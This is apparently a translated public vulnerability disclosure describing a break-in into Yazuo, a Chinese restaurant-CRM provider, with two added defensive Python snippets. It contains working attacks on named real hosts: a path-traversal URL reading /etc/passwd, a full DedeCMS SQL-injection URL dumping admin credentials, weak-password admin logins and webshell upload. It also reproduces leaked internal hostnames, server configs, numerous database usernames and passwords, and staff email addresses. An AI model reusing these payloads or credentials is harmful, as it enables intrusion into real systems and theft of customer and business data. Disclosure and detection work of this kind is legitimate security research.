2014-05-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-07-12: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
Yazuo, founded in April 2006, is the largest CRM service provider for the restaurant industry in China. Headquartered in Beijing, it has offices in 50 cities nationwide. In the iPark software park in Wuxi it has also built the country's largest restaurant data center, a product R&D center, a customer service center, and the Yazuo Business School, which offers professional management training to the restaurant industry.
A couple of days ago I went out to eat and walked past a Xinladao restaurant, where a waiter insisted that I scan a QR code to join their membership program. It was awkward to refuse, so I scanned it, and that is how this vulnerability came about.
After following the account, the member page inside WeChat looks as follows.
The User-Agent is not checked, so the page also opens in a desktop browser.

The merchant logo endpoint has an arbitrary file read.
First, collect some information for later use:
http://58.83.233.44/yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=../../../../../../etc/passwd
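As an added example (not code from the report or from Yazuo's application), the pattern behind the getImage.do traversal next to a hardened lookup for the same brandId/name request shape; the image root directory and the allowed extensions are assumptions:

```python
import os
from pathlib import Path
from typing import Optional

# Assumed location of the per-brand logo directory; not taken from the report.
IMAGE_ROOT = Path("/srv/weixin/brand_images").resolve()


def naive_brand_image(brand_id: str, name: str, root: Path = IMAGE_ROOT) -> str:
    """The shape of the bug: the request's name is joined onto the directory
    unchecked, so name=../../../../../../etc/passwd walks out of the image root."""
    return os.path.normpath(os.path.join(str(root), brand_id, name))


def resolve_brand_image(brand_id: str, name: str, root: Path = IMAGE_ROOT) -> Optional[Path]:
    """Hardened lookup for a getImage-style request. Returns the on-disk path, or
    None when any part of the request could leave the image root."""
    # brandId is an integer key, never a path fragment.
    if not brand_id.isdigit():
        return None
    # name must be one plain filename. The caller passes the URL-decoded value,
    # so reject separators, dot entries and NUL before touching the filesystem.
    if name in ("", ".", "..") or any(c in name for c in "/\\\x00"):
        return None
    if Path(name).suffix.lower() not in {".png", ".jpg", ".jpeg", ".gif"}:
        return None
    candidate = (root / brand_id / name).resolve()
    # Containment check after symlink resolution: relative_to raises ValueError
    # when candidate is not underneath root.
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate
```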
eth0
# Xen Virtual Ethernet
DEVICE=eth0
BOOTPROTO=none
ONBOOT=yes
HWADDR=2e:97:34:fd:02:b0
NETMASK=255.255.255.0
IPADDR=192.168.50.60
GATEWAY=192.168.50.254
TYPE=Ethernet
hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
#192.168.50.30 crmdb.yazuoyw.com
#192.168.50.60 WMSTradeServer
#192.168.56.40 www.backup.com
#192.168.49.50 tradedb.yazuoyw1.com
#192.168.50.50 crmdb.yazuoyw1.com
#192.168.49.30 tradedb.yazuoyw.com
#192.168.50.100 possys.yazuoyw.com
192.168.50.60 WMSTradeServer
192.168.49.30 tradedb.yazuoyw.com
192.168.49.55 bak.tradedb.yazuoyw.com
192.168.50.30 crmdb.yazuoyw.com
192.168.50.55 bak.crmdb.yazuoyw.com
192.168.49.210 crmapi.yazuoyw.com
192.168.49.210 possys.yazuoyw.com
192.168.49.210 webservice.yazuoyw.com
192.168.49.210 mq.yazuoyw.com
192.168.59.10 gp.yazuoyw.com
192.168.50.160 memcache1.yazuoyw.com
192.168.50.165 memcache2.yazuoyw.com
192.168.49.70 miralcedb.yazuoyw.com
Scanning the C-class range roughly establishes it as 58.83.233.30-70.
http://crm.yazuo.com/ Yazuo CRM, the core system
http://58.83.233.61/index.htm contract management
http://58.83.233.57/index.html sales management
http://58.83.233.56/ ERP
http://www.yazuo.com/ main site
http://58.83.233.44/yazuo-weixin/weixin/ the interface used for WeChat QR-code scanning in the individual restaurants
First, the more important issues.
The main site runs DedeCMS and has SQL injection:
http://www.yazuo.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
文档的名称是:|nnwhko|4057d57572f1303b1bef
网址是:http://127.0.0.1:819=3
The admin backend path happens to be exactly this username:
http://www.yazuo.com/nnwhko/login.php?gotopage=%2Fnnwhko%2F
Cracked the password, got into the backend, getshell.
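As an added example (not part of the report), detection logic run over constructed Apache access-log lines that flags the two request patterns shown above: the traversal in the getImage.do name parameter and the DedeCMS recommend.php _FILES injection; the log lines, client IPs and rule names are made up:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2014:10:01:02 +0800] "GET /yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2014:10:01:09 +0800] "GET /yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:02:30 +0800] "GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C%27%20or%20mid=@`%5C%27`%20/*!50000union*//*!50000select*/1,2,3&_FILES[type][name]=1.jpg HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2014:10:03:00 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# One request line per entry: client IP, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the request patterns in the report; the rule names are our own.
RULES = [
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("dedecms-files-injection", re.compile(r"_FILES\[[^\]]*\]\[tmp_name\]", re.IGNORECASE)),
    ("mysql-versioned-comment", re.compile(r"/\*!\d{5}\s*(union|select)", re.IGNORECASE)),
]


def scan_access_log(text):
    """Return one finding per request line that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        # Decode twice so that %2F and double-encoded %252F traversal both surface.
        target = unquote(unquote(m.group("target")))
        path = target.partition("?")[0]
        matched = [name for name, rx in RULES if rx.search(target)]
        if matched:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": path,
                "status": int(m.group("status")),
                "rules": matched,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["status"], ",".join(f["rules"]))
```

A 200 status on a flagged traversal request, as in the second sample line, is the signal to escalate: the server returned content rather than rejecting the request.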

The CRM system has no registration, so passwords can only be guessed.
Relying on years of good karma: 18888888888 with password 123456 logged in successfully.
And it happens to be an administrator too, wonderful.

The functionality is quite powerful: it can manage all kinds of member information, top up balances, send SMS, and so on.
Topping up balances is, of course, the most practical one.
Look at the performance figures of this one chain, tsk tsk (after getting into the ERP later, I found there are three or four hundred restaurants: South Beauty, Xiabu Xiabu, Xinladao, lots of well-known names).

Successfully got a shell through the image upload in the "create marketing campaign" feature.

<VirtualHost *:80>
DocumentRoot "/yazuo_apps/crm35/current/public/"
ServerName crm.yazuo.com
CustomLog "|cronolog /var/log/httpd/crm.yazuo.com/access_log.%Y%m%d " combined
ErrorLog "|cronolog /var/log/httpd/crm.yazuo.com/error_log.%Y%m%d "
<Directory "/yazuo_apps/crm35">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
#image server
<VirtualHost *:80>
DocumentRoot "/yazuo_apps/crm35/current/data/upload/"
ServerName static.yazuo.com
CustomLog "|cronolog /var/log/httpd/static.yazuo.com/access_log.%Y%m%d " combined
ErrorLog "|cronolog /var/log/httpd/static.yazuo.com/error_log.%Y%m%d "
<Directory "/yazuo_apps/crm35">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
#WeChat CRM
<VirtualHost *:80>
DocumentRoot "/yazuo_apps/weixin_crm/current/public/"
ServerName weixincrm.yazuo.com
CustomLog "|cronolog /var/log/httpd/weixin_crm/access_log.%Y%m%d " combined
ErrorLog "|cronolog /var/log/httpd/weixin_crm/error_log.%Y%m%d "
<Directory "/yazuo_apps/weixin_crm">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
#WeChat CRM demo
<VirtualHost *:80>
DocumentRoot "/yazuo_apps/weixin_crm_test/current/public/"
ServerName 58.83.233.45
CustomLog "|cronolog /var/log/httpd/weixin_crm_test/access_log.%Y%m%d " combined
ErrorLog "|cronolog /var/log/httpd/weixin_crm_test/error_log.%Y%m%d "
<Directory "/yazuo_apps/weixin_crm_test">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
<VirtualHost *:80>
DocumentRoot "/yazuo_apps/yazuoapi"
ServerName space.yazuosoft.com
CustomLog "|cronolog /var/log/httpd/space.yazuosoft.com/access_log.%Y%m%d " combined
ErrorLog "|cronolog /var/log/httpd/space.yazuosoft.com/error_log.%Y%m%d "
<Directory "/yazuo_apps/yazuoapi">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
#memcached admin tool
<Directory "/yazuo_apps/memadmin">
Options FollowSymLinks
AllowOverride all
Order allow,deny
Allow from all
</Directory>
<VirtualHost *:80>
DocumentRoot "/yazuo_apps/memadmin/"
ServerName memadmin.yazuo.com
</VirtualHost>
The config file is spectacular: connection parameters for every database.
'db' =>
array (
'adapter' => 'PDO_PGSQL',
'params' =>
array (
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'dev',
'password' => 'devASDFZXCV',
'dbname' => 'crm',
),
),
'multidb' =>
array (
'db1' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'dev',
'password' => 'devASDFZXCV',
'dbname' => 'crm',
'default' => '1',
),
'db2' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'dev',
'password' => 'devASDFZXCV',
'dbname' => 'crm',
),
'dbmsg' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'dev',
'password' => 'devASDFZXCV',
'dbname' => 'shortmessage',
),
'dbtrade' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'tradedb.yazuoyw.com',
'port' => '5432',
'username' => 'oper',
'password' => 'oper#EDC$RFV',
'dbname' => 'trade',
),
'dbweixin' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'weixin',
'password' => 'weixinASDFZXCV',
'dbname' => 'crm',
),
'db70' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'crmdb.yazuoyw.com',
'port' => '5432',
'username' => 'trace',
'password' => 'tracecrm',
'dbname' => 'crm',
),
'dbgp' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'gp.yazuoyw.com',
'port' => '5432',
'username' => 'dev',
'password' => 'devASDFZXCV',
'dbname' => 'crm',
),
'dbweibo' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => 'gp.yazuoyw.com',
'port' => '5432',
'username' => 'weibo',
'password' => 'weibogp',
'dbname' => 'weibo_product',
),
'dberp' =>
array (
'adapter' => 'PDO_PGSQL',
'host' => '192.168.49.100',
'port' => '5432',
'username' => 'erp',
'password' => 'erp',
'dbname' => 'erp',
),
array (
'email' => 'webadmin@yazuo.com',
'name' => '雅座CRM标准版',
),
'defaultReplyTo' =>
array (
'email' => 'songlixin@yazuo.com',
'name' => '宋利新',
),
'marketingReplyList' =>
array (
0 =>
array (
'email' => 'songlixin@yazuo.com', (if WooYun wants to contact the vendor, try this email)
'name' => '宋利新',
),
1 =>
array (
'email' => 'yingxiao@yazuo.com',
'name' => '营销组',
),
),
No need to describe the rest; I successfully found my own registration record in the weixin database, along with my balance and so on.
I did not look at the data volume in detail; it should be considerable.
Next one:
http://58.83.233.57/index.html logged in with the weak credentials test/test; did not test whether getshell is possible, since the database was already obtained.
The databases for the ERP and similar sites can also be found in the config above.
The administrator phone number 1360130xxxx also logged in successfully.
A word of warning: most CRM users' passwords are the same weak password, which is not good.
Vulnerability response. Vendor response:
Unable to contact the vendor, or the vendor actively refused.